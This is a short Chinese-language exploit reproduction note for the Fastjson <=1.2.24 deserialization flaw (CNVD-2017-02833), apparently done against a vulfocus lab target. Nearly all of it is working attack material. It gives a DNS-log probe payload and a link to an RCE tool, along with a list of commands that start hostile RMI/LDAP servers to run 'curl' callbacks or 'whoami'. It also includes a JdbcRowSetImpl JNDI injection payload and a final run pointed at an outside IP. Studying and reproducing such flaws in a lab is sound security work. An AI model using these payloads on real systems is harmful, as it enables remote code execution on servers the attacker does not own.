0x01 漏洞概述

0x02 漏洞版本

  1. Fastjson <=1.2.24

0x03 漏洞复现

  1. vulfocus-fastjson-cnvd-2017-02833

POC

请求头改为POST,添加下面的Payload

  1. {"naraku":{"@type":"java.net.Inet4Address","val":"xxx.dnslog.cn"}}

EXP

  1. https://github.com/wyzxxz/fastjson_rce_tool
  3. java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" 
  4. java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn"
  5. java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami"
  6. java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename  tamper=tohex
  7. java -cp fastjson_tool.jar fastjson.LDAPRefServer2 1099  CommonsCollections1 "curl dnslog.cn"
  8. java -cp fastjson_tool.jar fastjson.BCELEncode "curl dnslog.wyzxxz.cn"
  9. java -cp fastjson_tool.jar fastjson.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy
  10. java -cp fastjson_tool.jar fastjson.Tamper  "{\"abc\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/Object\",\"autoCommit\":true}}"

执行EXP

  1. java -cp fastjson_tool.jar fastjson.HLDAPServer 8.8.8.8 3565 "curl 8cvxqn.dnslog.cn"

CNVD_2017_02833-RCE - 图1

CNVD_2017_02833-RCE - 图2